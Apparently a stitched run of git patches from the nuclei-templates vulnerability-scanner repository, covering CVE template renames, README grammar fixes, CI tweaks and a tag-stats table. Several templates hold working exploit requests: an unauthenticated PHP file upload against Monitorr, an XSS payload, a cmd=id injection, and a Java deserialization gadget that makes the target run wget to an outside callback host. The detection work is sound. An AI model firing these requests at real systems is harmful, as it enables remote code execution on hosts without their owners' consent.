| | | | | | | | -| mongoshake | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| grav | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | | weiphp | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | | flash | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | | esmtp | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| wp-theme | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| linkerd | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | | dotnet | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| status | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| targa | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| igs | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | From d27fb4c3b01e7aadeda17d196c3b124169d6373c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 20 Jul 2021 12:49:16 +0700 Subject: [PATCH 0917/4083] Renamed CVE-2020-8771.yaml --- .../2020/CVE-2020-8771.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml => cves/2020/CVE-2020-8771.yaml (88%) diff --git a/vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml b/cves/2020/CVE-2020-8771.yaml similarity index 88% rename from vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml rename to cves/2020/CVE-2020-8771.yaml index 85f0ba23c5..7d5602f3fd 100644 --- a/vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml +++ b/cves/2020/CVE-2020-8771.yaml @@ -1,11 +1,11 @@ -id: wordpress-auth-bypass-wptimecapsule +id: CVE-2020-8771 info: name: WordPress WP Time Capsule Authentication Bypass author: princechaddha severity: critical reference: https://github.com/SECFORCE/WPTimeCapsulePOC - tags: wordpress,wp-plugin + tags: cve,cve2018,wordpress,wp-plugin requests: - raw: @@ -47,4 +47,4 @@ requests: - type: regex part: header regex: - - "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)" \ No newline at end of file + - "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)" From 19fe96bc453dabd787465055f6924e88a81e6ca1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 11:33:16 +0530 Subject: [PATCH 0918/4083] minor improvements and file name update --- .../2020/CVE-2020-28871.yaml | 17 +++++------------ 1 file changed, 5 insertions(+), 12 deletions(-) rename vulnerabilities/other/monitorr-rce.yaml => cves/2020/CVE-2020-28871.yaml (73%) diff --git a/vulnerabilities/other/monitorr-rce.yaml b/cves/2020/CVE-2020-28871.yaml similarity index 73% rename from vulnerabilities/other/monitorr-rce.yaml rename to cves/2020/CVE-2020-28871.yaml index 86f592d6d9..b6567e7135 100644 --- a/vulnerabilities/other/monitorr-rce.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -1,4 +1,4 @@ -id: monitorr-rce +id: CVE-2020-28871 info: name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution @@ -6,16 +6,16 @@ info: severity: critical description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr. reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2020-28871 - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - https://www.exploit-db.com/exploits/48980 - tags: monitorr,rce,oob + tags: cve,cve2020,monitorr,rce,oob requests: - raw: - | POST /assets/php/upload.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Accept-Encoding: gzip, deflate Accept: text/plain, */*; q=0.01 Connection: close @@ -24,10 +24,9 @@ requests: Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745 Origin: http://{{Hostname}} Referer: http://{{Hostname}} - Content-Length: 319 -----------------------------31046105003900160576454225745 - Content-Disposition: form-data; name="fileToUpload"; filename="nuclei_poc.php" + Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php" Content-Type: image/gif GIF89a213213123 Date: Tue, 20 Jul 2021 11:35:57 +0530 Subject: [PATCH 0919/4083] Update CVE-2020-8771.yaml --- cves/2020/CVE-2020-8771.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-8771.yaml b/cves/2020/CVE-2020-8771.yaml index 7d5602f3fd..5cf989eb97 100644 --- a/cves/2020/CVE-2020-8771.yaml +++ b/cves/2020/CVE-2020-8771.yaml @@ -5,7 +5,7 @@ info: author: princechaddha severity: critical reference: https://github.com/SECFORCE/WPTimeCapsulePOC - tags: cve,cve2018,wordpress,wp-plugin + tags: cve,cve2020,wordpress,wp-plugin requests: - raw: @@ -24,7 +24,6 @@ requests: Accept: */* cookie-reuse: true - matchers-condition: and matchers: - type: word From 13e5528c46446c4092eedd8cfae0b3fec1d167cf Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 11:40:23 +0530 Subject: [PATCH 0920/4083] duplicate update --- cves/2019/CVE-2019-15713.yaml | 2 +- .../wordpress/wpmudev-my-calender-xss.yaml | 29 ------------------- 2 files changed, 1 insertion(+), 30 deletions(-) delete mode 100644 vulnerabilities/wordpress/wpmudev-my-calender-xss.yaml diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml index 311cc6e005..ab5c7ca5fe 100644 --- a/cves/2019/CVE-2019-15713.yaml +++ b/cves/2019/CVE-2019-15713.yaml @@ -2,7 +2,7 @@ id: CVE-2019-15713 info: name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) - author: daffainfo + author: daffainfo,dhiyaneshDk severity: medium description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. reference: | diff --git a/vulnerabilities/wordpress/wpmudev-my-calender-xss.yaml b/vulnerabilities/wordpress/wpmudev-my-calender-xss.yaml deleted file mode 100644 index 5c59b0b537..0000000000 --- a/vulnerabilities/wordpress/wpmudev-my-calender-xss.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: my-calender-xss - -info: - name: My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS) - author: dhiyaneshDk - severity: medium - reference: https://wpscan.com/vulnerability/9267 - tags: wordpress - -requests: - - method: GET - path: - - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm(%2F{{randstr}}%2F)%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 From 71f7b947a88c57477dc1fd013b41cfbdfadb7e42 Mon Sep 17 00:00:00 2001 From: Niels Hofmans Date: Tue, 20 Jul 2021 08:14:37 +0200 Subject: [PATCH 0921/4083] chore: rephrase readme Fixes some grammar mistakes --- README.md | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index bfb7b06b0d..95561517c1 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,7 @@

    Nuclei Templates

    -

    Community curated list of templates for the nuclei engine to find a security vulnerability in application.

    +

    Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.

    @@ -24,7 +24,7 @@ Nuclei Templates ---- -Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list. +Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine. This repository stores various templates for the scanner provided by our team, as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list. ## Nuclei Templates overview @@ -57,7 +57,8 @@ An overview of the nuclei template directory including number of templates assoc 📖 Documentation ----- -Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding. +Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates. +Ee have also added a set of example templates to help you understand how things work. 💪 Contributions ----- @@ -67,7 +68,7 @@ Nuclei-templates is powered by major contributions from the community. [Template 💬 Discussion ----- -Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board. +Have questions / doubts / ideas to discuss? Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board. 👨‍💻 Community ----- @@ -79,4 +80,4 @@ You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). Yo - Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests. -Thanks again for your contribution and keeping the community vibrant. :heart: +Thanks again for your contribution and keeping this community vibrant. :heart: From 0ae92650b9310bb7c0a01619102b749584231733 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 11:45:05 +0530 Subject: [PATCH 0922/4083] minor improvements --- .github/workflows/templates-stats.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 9457a24b98..ff20e740ed 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -26,6 +26,7 @@ jobs: key: ${{ runner.os }}-go - name: Installing Template Stats + if: steps.cache-go.outputs.cache-hit != 'true' env: GO111MODULE: on run: | @@ -44,6 +45,7 @@ jobs: - name: Commit files run: | + git pull --tags -f git add TEMPLATES-STATS.md git add TEMPLATES-STATS.json git config --local user.email "action@github.com" From 0dacd565679c3510444dd83bd90daeed0289a2f9 Mon Sep 17 00:00:00 2001 From: Niels Hofmans Date: Tue, 20 Jul 2021 08:35:06 +0200 Subject: [PATCH 0923/4083] chore: rephrase --- .github/scripts/README.tmpl | 22 ++++++++++++++-------- 1 file changed, 14 insertions(+), 8 deletions(-) diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl index 0bb7102614..29e8d08bf1 100644 --- a/.github/scripts/README.tmpl +++ b/.github/scripts/README.tmpl @@ -3,7 +3,7 @@ f"""

    Nuclei Templates

    -

    Community curated list of templates for the nuclei engine to find a security vulnerability in application.

    +

    Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.

    @@ -24,7 +24,9 @@ Nuclei Templates ---- -Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list. +Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine. +This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community. +We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list. ## Nuclei Templates overview @@ -57,27 +59,31 @@ An overview of the nuclei template directory including number of templates assoc 📖 Documentation ----- -Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding. +Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates. +We have also added a set of templates to help you understand how things work. 💪 Contributions ----- -Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. +Nuclei-templates is powered by major contributions from the community. +[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. 💬 Discussion ----- -Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board. +Have questions / doubts / ideas to discuss? +Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board. 👨‍💻 Community ----- -You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery. +You are welcome to join our [Discord Community](https://discord.gg/KECAGdH). +You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery. 💡 Notes ----- - Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests. -Thanks again for your contribution and keeping the community vibrant. :heart: -""" \ No newline at end of file +Thanks again for your contribution and keeping this community vibrant. :heart: +""" From 21809132da8d9bba2b44577ded4598d83aea7f73 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 20 Jul 2021 13:36:04 +0700 Subject: [PATCH 0924/4083] Renamed to CVE-2021-24340.yaml --- .../2021/CVE-2021-24340.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml => cves/2021/CVE-2021-24340.yaml (92%) diff --git a/vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml b/cves/2021/CVE-2021-24340.yaml similarity index 92% rename from vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml rename to cves/2021/CVE-2021-24340.yaml index da683968f2..0f6578244b 100644 --- a/vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml +++ b/cves/2021/CVE-2021-24340.yaml @@ -1,4 +1,4 @@ -id: wp-plugin-statistics-sqli +id: CVE-2021-24340 info: name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/exploits/49894 - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ - https://github.com/Udyz/WP-Statistics-BlindSQL - tags: wordpress,wp-plugin,unauth,sqli,blind + tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind requests: - method: GET From c5088ab9bcad51dda15d904c358e12d882dd6ea9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 12:12:18 +0530 Subject: [PATCH 0925/4083] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 95561517c1..740381b4d9 100644 --- a/README.md +++ b/README.md @@ -58,7 +58,7 @@ An overview of the nuclei template directory including number of templates assoc ----- Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates. -Ee have also added a set of example templates to help you understand how things work. +We have also added a set of example templates to help you understand how things work. 💪 Contributions ----- From 4e505722b224a2c86025f99d130edef67ea2fc47 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jul 2021 14:49:04 +0700 Subject: [PATCH 0926/4083] Initialize Top 10 stats --- TOP-10.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 TOP-10.md diff --git a/TOP-10.md b/TOP-10.md new file mode 100644 index 0000000000..8f5b14bdca --- /dev/null +++ b/TOP-10.md @@ -0,0 +1,12 @@ +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| +| cve | 467 | dhiyaneshdk | 202 | cves | 473 | info | 453 | http | 1409 | +| panel | 201 | pdteam | 184 | vulnerabilities | 230 | high | 395 | file | 42 | +| xss | 169 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 | +| wordpress | 164 | dwisiswant0 | 113 | exposures | 150 | critical | 187 | dns | 10 | +| rce | 162 | geeknik | 89 | technologies | 129 | low | 150 | | | +| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | | +| cve2020 | 137 | madrobot | 59 | takeovers | 70 | | | | | +| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | | +| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | | +| cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | | From 2d95c8dbfc62128edf16ca2c3b4d19d37fbdd620 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 20 Jul 2021 14:49:43 +0700 Subject: [PATCH 0927/4083] Update README template to call get top 10 --- .github/scripts/README.tmpl | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl index 29e8d08bf1..6c65868500 100644 --- a/.github/scripts/README.tmpl +++ b/.github/scripts/README.tmpl @@ -53,7 +53,7 @@ An overview of the nuclei template directory including number of templates assoc

    Command: Date: Sun, 18 Jul 2021 19:33:28 +0530 Subject: [PATCH 0806/4083] Update CVE-2021-21307.yaml --- cves/2021/CVE-2021-21307.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml index 76df8daeb8..92e10c91a5 100644 --- a/cves/2021/CVE-2021-21307.yaml +++ b/cves/2021/CVE-2021-21307.yaml @@ -67,7 +67,7 @@ requests: Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded - cmd=id&opts=&timeout=5 + cmd=id&opts=&timeout=5 matchers-condition: and matchers: From a3057a63ae5acf6917271b7b3e5394777b1ae465 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 18 Jul 2021 22:00:43 +0530 Subject: [PATCH 0807/4083] Added Deserialization POC --- iot/qvisdvr-deserialization-rce.yaml | 50 +++++++++++++++++++++++++++ iot/qvisdvr-java-deserialization.yaml | 18 ---------- 2 files changed, 50 insertions(+), 18 deletions(-) create mode 100644 iot/qvisdvr-deserialization-rce.yaml delete mode 100644 iot/qvisdvr-java-deserialization.yaml diff --git a/iot/qvisdvr-deserialization-rce.yaml b/iot/qvisdvr-deserialization-rce.yaml new file mode 100644 index 0000000000..f8316e0d7d --- /dev/null +++ b/iot/qvisdvr-deserialization-rce.yaml @@ -0,0 +1,50 @@ +id: qvisdvr-deserialization-rce + +info: + author: me9187 + name: QVISDVR JSF Deserialization - Remote Code Execution + severity: critical + reference: https://twitter.com/Me9187/status/1414606876575162373 + tags: qvisdvr,rce,deserialization,jsf,iot + +requests: + - raw: + - | + GET /qvisdvr/ HTTP/1.1 + Accept-Encoding: gzip, deflate + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9 + Content-Type: application/x-www-form-urlencoded + - | + POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1 + Accept-Encoding: gzip, deflate + Content-Length: 1884 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Host: {{Hostname}} + Connection: close + User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) + Content-Type: application/x-www-form-urlencoded + + javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}")}} + + extractors: + - type: regex + name: token + group: 1 + internal: true + part: header + regex: + - "JSESSIONID=(.*)" + + matchers-condition: and + matchers: + - type: status + status: + - 500 + + - type: word + part: interactsh_protocol + words: + - http \ No newline at end of file diff --git a/iot/qvisdvr-java-deserialization.yaml b/iot/qvisdvr-java-deserialization.yaml deleted file mode 100644 index a11811614a..0000000000 --- a/iot/qvisdvr-java-deserialization.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: qvisdvr-java-deserialization - -info: - name: QVISdvr Java Deserialization - author: me9187 - severity: critical - description: Searches for /qvisdvr/index.faces use https://github.com/joaomatosf/jexboss to Get RCE! - references: https://github.com/joaomatosf/jexboss - tags: rce - -requests: - - method: GET - path: - - "{{BaseURL}}/qvisdvr/" - matchers: - - type: word - words: - - "/qvisdvr/index.faces" From 718b8bfdd93b78673a48f19ac02241bdde728c47 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 18 Jul 2021 22:02:30 +0530 Subject: [PATCH 0808/4083] Update qvisdvr-deserialization-rce.yaml --- iot/qvisdvr-deserialization-rce.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/iot/qvisdvr-deserialization-rce.yaml b/iot/qvisdvr-deserialization-rce.yaml index f8316e0d7d..9d77efad68 100644 --- a/iot/qvisdvr-deserialization-rce.yaml +++ b/iot/qvisdvr-deserialization-rce.yaml @@ -11,18 +11,18 @@ requests: - raw: - | GET /qvisdvr/ HTTP/1.1 + Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Host: {{Hostname}} Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9 Content-Type: application/x-www-form-urlencoded - | POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1 + Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Length: 1884 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Host: {{Hostname}} Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded From 76e95ac1e5ba971f9c1762578f83cc5fafdbfe01 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 18 Jul 2021 22:36:15 +0530 Subject: [PATCH 0809/4083] Minor improvements --- 